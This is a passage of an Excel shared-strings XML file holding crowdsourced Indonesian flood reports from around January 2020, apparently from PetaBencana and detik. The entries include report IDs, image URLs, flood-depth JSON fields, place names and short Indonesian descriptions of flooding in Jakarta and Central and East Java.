  </si>
  <si>
    <t>582743d9-6d80-49e9-9149-2b67da10591d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/582743d9-6d80-49e9-9149-2b67da10591d.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 25 }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "6391", "instance_region_code": "srg" }</t>
  </si>
  <si>
    <t>Terboyo Kulon</t>
  </si>
  <si>
    <t>Genuk</t>
  </si>
  <si>
    <t>8050d938-da4a-44af-a6e4-6a7224cc5f75</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 85 }</t>
  </si>
  <si>
    <t>Banjir di kecamatan benjeng Gresik relawan Tagana kab Gresik telah mendirikan posko bantuan di kantor kelurahan munggugianti benjeng Gresik.</t>
  </si>
  <si>
    <t>Bengkelolor</t>
  </si>
  <si>
    <t>Benjeng</t>
  </si>
  <si>
    <t>Gresik</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347425</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/08/347425-15784404971245028903.mov-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2653", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Penampakan Tumpukan Sampah dan Lumpur di Sungai Ciliwung</t>
  </si>
  <si>
    <t>Saat ciliwung dangkal yg nampak hanya sampah dan lumpur yg perlu dibersihkan ini</t>
  </si>
  <si>
    <t>41b8bbcc-b290-426c-9923-91d58798f486</t>
  </si>
  <si>
    <t>https://images.petabencana.id/41b8bbcc-b290-426c-9923-91d58798f486.jpg</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 63, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Biasanya gak pernah banjir, tapi tanggal 1 januari 2020 kemarin banjir tinggi dan masuk rumah warga.</t>
  </si>
  <si>
    <t>d96ad987-66d7-4c5c-ba56-b6f73a9dca0d</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 164, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2382", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dijalan H Djairi Rt.004 / Rw.002 Rawabuaya cengkareng Jakarta Barat</t>
  </si>
  <si>
    <t>2b488590-2759-4fd1-937a-6681db30f6fe</t>
  </si>
  <si>
    <t>Banjir semakin  tinggi</t>
  </si>
  <si>
    <t>Rawoh</t>
  </si>
  <si>
    <t>Karangrayung</t>
  </si>
  <si>
    <t>Grobogan</t>
  </si>
  <si>
    <t>33ab8612-d810-424c-a41a-eb74f831650b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/33ab8612-d810-424c-a41a-eb74f831650b.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 66 }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "srg" }</t>
  </si>
  <si>
    <t>Wates</t>
  </si>
  <si>
    <t>Kedungjati</t>
  </si>
  <si>
    <t>ad949b91-81ac-4633-b34b-dcd7eec411dc</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 71 }</t>
  </si>
  <si>
    <t>Banjir luapan sungai tuntang</t>
  </si>
  <si>
    <t>Ngroto</t>
  </si>
  <si>
    <t>Gubug</t>
  </si>
  <si>
    <t>9651d8ba-db04-403e-a603-ed086e5337be</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 1, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1175", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>cikoko timur ga banjir sama sekali?? abis ujan langsung kebawa sama air selokan..</t>
  </si>
  <si>
    <t>Cikoko</t>
  </si>
  <si>
    <t>Pancoran</t>
  </si>
  <si>
    <t>a7ad63e2-e8f2-4bd2-aee3-d5427d703032</t>
  </si>
  <si>
    <t>Jalan Morowudi yang banjir.</t>
  </si>
  <si>
    <t>Putat Lor</t>
  </si>
  <si>
    <t>Menganti</t>
  </si>
  <si>
    <t>725a42db-03f2-4da0-9f8d-b177b7366819</t>
  </si>
  <si>
    <t>https://images.petabencana.id/725a42db-03f2-4da0-9f8d-b177b7366819.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "6544", "instance_region_code": "srg" }</t>
  </si>
  <si>
    <t>Gebangsari</t>
  </si>
  <si>
    <t>068153c5-71fd-4b9e-958e-346505e5d617</t>
  </si>
  <si>
    <t>https://images.petabencana.id/068153c5-71fd-4b9e-958e-346505e5d617.jpg</t>
  </si>
  <si>
    <t>Banjir Besar kota Lahat Terjadi Di Kikim dan Gumay Talang</t>
  </si>
  <si>
    <t>Tanjung Jambu</t>
  </si>
  <si>
    <t>Merapi Timur</t>
  </si>
  <si>
    <t>Lahat</t>
  </si>
  <si>
    <t>Sumatera Selatan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347552</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/11/15787119411423167531.jpg</t>
  </si>
  <si>
    <t>Antisipasi Banjir, Ini yang Dilakukan Pemkot Madiun</t>
  </si>
  <si>
    <t>Antisipasi banjir, anggota Polsek Kartoharjo, bersama anggota TNI dan petugas Kelurahan Tawangrejo, melakukan penguraian sampah di kali Sono Kelurahan Tawangrejo Kecamatan Kartoharjo Kota Madiun. (11/01/20)</t>
  </si>
  <si>
    <t>98c53732-5ed1-4308-a22f-cbbe468d2e75</t>
  </si>
  <si>
    <t>https://images.petabencana.id/98c53732-5ed1-4308-a22f-cbbe468d2e75.jpg</t>
  </si>
  <si>
    <t>Banjir dikarenakan tanggul kali tuntang jebol likasi desa trimulyo kec. Guntur kab. Demak</t>
  </si>
  <si>
    <t>Trimulyo</t>
  </si>
  <si>
    <t>Guntur</t>
  </si>
  <si>
    <t>Demak</t>
  </si>
  <si>
    <t>a3c0a733-445d-40f0-bb3c-5a01bd944d8f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3c0a733-445d-40f0-bb3c-5a01bd944d8f.jpg</t>
  </si>
  <si>
    <t>Banjir kenangan di graha bnpb</t>
  </si>
  <si>
    <t>2f8deaae-77de-40f6-918a-e7ad059ba4c4</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 146 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1921", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Utan Kayu Utara</t>
  </si>
  <si>
    <t>Matraman</t>
  </si>
  <si>
    <t>0bb35cb9-43f1-4947-833a-4949bf2ab82c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0bb35cb9-43f1-4947-833a-4949bf2ab82c.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 144 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1943", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sudah surut</t>
  </si>
  <si>
    <t>93cd1610-06b9-4f76-81d2-493b2ba09b9e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93cd1610-06b9-4f76-81d2-493b2ba09b9e.jpg</t>
  </si>
  <si>
    <t>Korban Banjir</t>
  </si>
  <si>
    <t>5e396b20-c38f-4ca4-87c8-de488777c6ec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5e396b20-c38f-4ca4-87c8-de488777c6ec.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 22 }</t>
  </si>
  <si>
    <t>Sedang berlatih bersmaa @petabencana</t>
  </si>
  <si>
    <t>49b3e71a-461b-4b31-be9a-43f6860c1551</t>
  </si>
  <si>
    <t>https://images.petabencana.id/49b3e71a-461b-4b31-be9a-43f6860c1551.jpg</t>
  </si>
  <si>
    <t>ada kuburan yang terendam banjir di timbulsloko sayung demak</t>
  </si>
  <si>
    <t>Timbulsloko</t>
  </si>
  <si>
    <t>Sayung</t>
  </si>
  <si>
    <t>4021fc22-9e73-4267-a0e8-641c6502a6b8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4021fc22-9e73-4267-a0e8-641c6502a6b8.jpg</t>
  </si>
  <si>
    <t>Banjir bandang</t>
  </si>
  <si>
    <t>fa608893-508f-4485-bbf8-4664f2ddfd41</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1851", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>94b8b094-2cd9-4243-b38b-8d6fe0d8b9d7</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "bdg" }</t>
  </si>
  <si>
    <t>Banjir di sekitar Komplek Santosa Asih Jaya Cipamokolan Kota Bandung. Banjir diakibatkan karena adanya hujan deras selama kurun waktu yglama</t>
  </si>
  <si>
    <t>Cipamokolan</t>
  </si>
  <si>
    <t>Rancasari</t>
  </si>
  <si>
    <t>Bandung</t>
  </si>
  <si>
    <t>8b93561b-965e-4967-8855-aeb0adab1959</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b93561b-965e-4967-8855-aeb0adab1959.jpg</t>
  </si>
  <si>
    <t>Margasari</t>
  </si>
  <si>
    <t>Buahbatu</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347831</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/18/347831-1579302688223430556.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1342", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Diguyur Hujan Deras,</t>
  </si>
  <si>
    <t>Diguyur hujan deras beberapa menit, jalan Prof. Dr. Satrio Setia Budi Jakarta, tampak Banjir Sekitar 30cm.</t>
  </si>
  <si>
    <t>Karet Semanggi</t>
  </si>
  <si>
    <t>a3abf868-9f21-4532-8806-b0e223fe36df</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3abf868-9f21-4532-8806-b0e223fe36df.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 23, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "777", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Belakang moestopo</t>
  </si>
  <si>
    <t>Gelora</t>
  </si>
  <si>
    <t>Tanah Abang</t>
  </si>
  <si>
    <t>e9a9ebc9-3eb6-494c-949c-54c2d215624c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e9a9ebc9-3eb6-494c-949c-54c2d215624c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "296", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air meluap dari kali kecil belakang dan ada kiriman air ujan dari atas.</t>
  </si>
  <si>
    <t>Kemanggisan</t>
  </si>
  <si>
    <t>Palmerah</t>
  </si>
  <si>
    <t>d7066c0a-c157-4c60-9b37-2ace8ff19657</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d7066c0a-c157-4c60-9b37-2ace8ff19657.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 28, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2569", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ketinggian air sangan cepat saat ini sudah 30cm</t>
  </si>
  <si>
    <t>fff8b779-75d8-4ae8-b40b-bab5e948f415</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fff8b779-75d8-4ae8-b40b-bab5e948f415.jpg</t>
  </si>
  <si>
    <t>Pada hari ini, telah terjadi banjir setinggi betis - perut orang dewasa.</t>
  </si>
  <si>
    <t>de67ee63-a5b0-48fc-be41-bfd46679f165</t>
  </si>
  <si>
    <t>https://images.petabencana.id/de67ee63-a5b0-48fc-be41-bfd46679f165.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 133 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1061", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di komplek tvri kemandoran, grogol utara, kebayoran lama, jakarta selatan. Tanggul kali yg melintasi komplek ini jebol sejak 1jan."</t>
  </si>
  <si>
    <t>Grogol Utara</t>
  </si>
  <si>
    <t>f1c9a824-1801-4fd5-b72b-b44e3a21a3f4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f1c9a824-1801-4fd5-b72b-b44e3a21a3f4.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 33, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "963", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Masih hujan, airnya masih naik terus</t>
  </si>
  <si>
    <t>2b080553-7b18-4f24-8be8-0ce948b4e7e9</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "783", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tadi sekitar jam 6 pas mau ke blok B tanah abang lewat CTA tanah Abang, terjadi banjir di berada tepat persis dibaw la jembatan</t>
  </si>
  <si>
    <t>Kampung Bali</t>
  </si>
  <si>
    <t>5481f553-cc14-480c-89fa-e544d88e2da0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5481f553-cc14-480c-89fa-e544d88e2da0.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 20, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "995", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kawasan rumah kami diguyur hujan deras sedari malam pukul 23.30wib</t>
  </si>
  <si>
    <t>Gunung</t>
  </si>
  <si>
    <t>71413014-9de8-4f80-968c-bce3726aa343</t>
  </si>
  <si>
    <t>https://images.petabencana.id/71413014-9de8-4f80-968c-bce3726aa343.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2488", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>hujan biasa2 saja, tapi banjir. Tolong segera di sedot pompanya  gardu listrik di jaga. Tolong pihak berwenang."</t>
  </si>
  <si>
    <t>8b047c73-4594-4597-8d48-77ae98198165</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b047c73-4594-4597-8d48-77ae98198165.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 15, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Skrg mah ujan deres dikit aja banjir..</t>
  </si>
  <si>
    <t>783c2f65-386e-4645-85d9-623e92008309</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 32, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "295", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sebelumnya wilayah rumah saya tidak pernah banjir. Inspeksi kali grogol dekat rumah saya tidak pernah di keruk lagi beberapa waktu ini.</t>
  </si>
  <si>
    <t>389ee96c-04cf-49c5-9c3c-2c83bad0a152</t>
  </si>
  <si>
    <t>https://images.petabencana.id/389ee96c-04cf-49c5-9c3c-2c83bad0a152.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 10, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2321", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Satpamwal (satuan pengamanan dan pengawalan) Mabes TNI. Aammaaannn ??</t>
  </si>
  <si>
    <t>Cilangkap</t>
  </si>
  <si>
    <t>b6da5f9f-67aa-4c61-94dc-0059c21cb70e</t>
  </si>
  <si>
    <t>Banjir tolongg</t>
  </si>
  <si>
    <t>d8c8a450-d10b-4cdc-afa5-4524e8dc1a42</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 21 }</t>
  </si>
  <si>
    <t>aaaa</t>
  </si>
  <si>
    <t>c3cfca11-3d1a-45da-862c-d0ccd0f19ffa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c3cfca11-3d1a-45da-862c-d0ccd0f19ffa.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 27 }</t>
  </si>
  <si>
    <t>Apel sebelm pembagian nasu</t>
  </si>
  <si>
    <t>Mojo</t>
  </si>
  <si>
    <t>Gubeng</t>
  </si>
  <si>
    <t>56b5ca4b-c020-426f-bb2a-0f55e27b3fd6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/56b5ca4b-c020-426f-bb2a-0f55e27b3fd6.jpg</t>
  </si>
  <si>
    <t>Telah terjadi banjir dengan ketinggian 80cm di gang post Rt 11 kebon pala makasar jakarta timur. Mohon warga agar tidak panik!</t>
  </si>
  <si>
    <t>685ae2af-e684-4f49-9b5d-cee34cf80f32</t>
  </si>
  <si>
    <t>https://images.petabencana.id/685ae2af-e684-4f49-9b5d-cee34cf80f32.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "58", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir banget misal</t>
  </si>
  <si>
    <t>Wijaya Kesuma</t>
  </si>
  <si>
    <t>e2503303-84b5-490b-911c-49121180bac3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e2503303-84b5-490b-911c-49121180bac3.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 6, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Hujan besar, gejala genangan air. Siap2</t>
  </si>
  <si>
    <t>f26a4a15-4f49-4404-823d-400c962cc6c3</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 10 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1863", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Got tidak mengalir</t>
  </si>
  <si>
    <t>Tanjung Priuk</t>
  </si>
  <si>
    <t>Tanjung Priok</t>
  </si>
  <si>
    <t>1e18ec12-343d-42cf-ad6e-6b8ff5e8b4d1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e18ec12-343d-42cf-ad6e-6b8ff5e8b4d1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2246", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sunter gaya motor raya banjir dari jam 10 pagi</t>
  </si>
  <si>
    <t>Sungai Bambu</t>
  </si>
  <si>
    <t>72560dbd-61fd-4b74-a1d3-0edcd85b4fd5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/72560dbd-61fd-4b74-a1d3-0edcd85b4fd5.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 18, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2269", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pompa air di sunter, saya cek di pantau banjir tidak ada yang nyala. Tolong segera di nyalakan</t>
  </si>
  <si>
    <t>Sunter Agung</t>
  </si>
  <si>
    <t>8808c06a-6ea6-4048-a7ab-e121efc0a7fb</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "715", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Dimohon bagi pengendara tidak melalui jalan tersebut</t>
  </si>
  <si>
    <t>Mangga Dua Selatan</t>
  </si>
  <si>
    <t>bab1beb5-c9d3-4293-956b-469c0ebc202d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bab1beb5-c9d3-4293-956b-469c0ebc202d.jpg</t>
  </si>
  <si>
    <t>banjir melebihi mata kaki</t>
  </si>
  <si>
    <t>a4f40038-d679-4028-ae3f-5b929b3311fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a4f40038-d679-4028-ae3f-5b929b3311fc.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 10, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "606", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>genangan dari jalan depan apartemen Mediterania palace menuju  ke jalan landas pacu (bundaran Kemayoran), mobil sudah mulai menghindar</t>
  </si>
  <si>
    <t>Kebon Kosong</t>
  </si>
  <si>
    <t>9eafa978-2dd5-4b95-b8bd-663fff61ece8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9eafa978-2dd5-4b95-b8bd-663fff61ece8.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2286", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan halte Sunter kelapa gading</t>
  </si>
  <si>
    <t>Sunter Jaya</t>
  </si>
  <si>
    <t>e339e96c-6670-4d34-89dd-7ee915d68737</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e339e96c-6670-4d34-89dd-7ee915d68737.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 30, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "541", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan sekitar 30-35 cm di Jl Johar Baru Utara VI RT 6 RW 5 belakang SMAN 27</t>
  </si>
  <si>
    <t>Johar Baru</t>
  </si>
  <si>
    <t>48dab8eb-a0fd-4bd1-a425-6724daf68383</t>
  </si>
  <si>
    <t>https://images.petabencana.id/48dab8eb-a0fd-4bd1-a425-6724daf68383.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2272", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan agung jaya, sunter</t>
  </si>
  <si>
    <t>42bc84ba-80b9-410c-a706-b259d08a8587</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 5 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "7", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>1714e40c-d208-4936-9f1b-5b8997cfa401</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1714e40c-d208-4936-9f1b-5b8997cfa401.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1669", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>a40ee1bc-1005-48c9-a2ed-8c2c80a9adf1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a40ee1bc-1005-48c9-a2ed-8c2c80a9adf1.jpg</t>
  </si>
  <si>
    <t>{ "points": -3, "flood_depth": 49, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2247", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir belakang masjid astra</t>
  </si>
  <si>
    <t>915fbf89-4d84-4430-8a9c-e4a35422dbbe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/915fbf89-4d84-4430-8a9c-e4a35422dbbe.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "946", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Adanya penggalian gorong gorong malah membuat semakin banjir di daerah bundaran kamal muara arah dadap dan sedang ada pasang ROB</t>
  </si>
  <si>
    <t>Kamal Muara</t>
  </si>
  <si>
    <t>7104a758-2f21-4234-bda8-a635d9a394b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7104a758-2f21-4234-bda8-a635d9a394b1.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 61, "report_type": "flood" }</t>
  </si>
  <si>
    <t>327521ca-c79d-4576-ab0a-9f8f5ccc118b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/327521ca-c79d-4576-ab0a-9f8f5ccc118b.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 16 }</t>
  </si>
  <si>
    <t>Air mulai menggenang di blok I - V</t>
  </si>
  <si>
    <t>4404956d-ebe3-4a56-bbfd-8c137278ca13</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4404956d-ebe3-4a56-bbfd-8c137278ca13.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1350", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl subur dalam, menteng atas banjir se betis orang dewasa.</t>
  </si>
  <si>
    <t>Menteng Atas</t>
  </si>
  <si>
    <t>24fd31c2-6881-4948-a185-ac694e3b266d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/24fd31c2-6881-4948-a185-ac694e3b266d.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 20 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "443", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Rt 14/16 kapuk, dekat pasar timbul cengkareng, genangan 10-30cm</t>
  </si>
  <si>
    <t>5f97e2df-abc9-4af3-b85e-f2c567e2f484</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5f97e2df-abc9-4af3-b85e-f2c567e2f484.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 70, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di depan Park Hotel cawang</t>
  </si>
  <si>
    <t>7562528c-5677-4a9b-b94b-f108cca5dcdd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7562528c-5677-4a9b-b94b-f108cca5dcdd.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1634", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sunter kelapa gading banjir sepaha orang dewasa</t>
  </si>
  <si>
    <t>Ciracas</t>
  </si>
  <si>
    <t>020fea09-b696-42dc-bcca-78c51b421d2c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/020fea09-b696-42dc-bcca-78c51b421d2c.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 47, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di jalan raya sudah setinggi ban mobil .. masih bisa dilewati namun harap berhati hati ??</t>
  </si>
  <si>
    <t>ae82363d-a4ec-442a-8266-77bb6b9c34f2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ae82363d-a4ec-442a-8266-77bb6b9c34f2.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 43 }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "602", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Poto pertama yg dikirim Jelas nya keluarga kirim video semua genangan air dah masuk kedlm rumah"</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348135</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/24/348135-1579839567775423869.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "509", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hujan Deras Genangan Terjadi di Jalan Agus Salim, Gambir</t>
  </si>
  <si>
    <t>Akibat Hujan deras yang turun sejak pagi, Genangan terjadi di Jalan Agus Salim, Gambir, Jakarta Pusat, Jum'at (24/1). hingga pukul 11, cuaca disekitar masih turun hujan.</t>
  </si>
  <si>
    <t>5e19ce7b-3d43-47db-ac0d-f1827e94b5ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5e19ce7b-3d43-47db-ac0d-f1827e94b5ee.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 23, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2273", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sunter telaga raya</t>
  </si>
  <si>
    <t>20560774-32e9-4a71-b1a8-421b8128669e</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 15, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1357", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>aman</t>
  </si>
  <si>
    <t>8fc83b1f-8298-40f4-8dd5-fcab821929a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8fc83b1f-8298-40f4-8dd5-fcab821929a0.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 31, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2498", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Terjebak banjir</t>
  </si>
  <si>
    <t>Cawang</t>
  </si>
  <si>
    <t>a4eec0f0-0259-4ee2-a0f2-c2def4327792</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a4eec0f0-0259-4ee2-a0f2-c2def4327792.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2668", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di jl.angsana raya rt 08 rw 012 cengkareng timur.CENGKARENG</t>
  </si>
  <si>
    <t>65b166f7-d382-4a4e-be19-7b56041394e0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/65b166f7-d382-4a4e-be19-7b56041394e0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2194", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Boulevard Barat Kelapa Gading</t>
  </si>
  <si>
    <t>dda549fa-7f67-4316-963e-d1d085e2a4fd</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 28 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2407", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Mulai dari jam 10 Pluit Barat 7 &amp; 8 Banjir.</t>
  </si>
  <si>
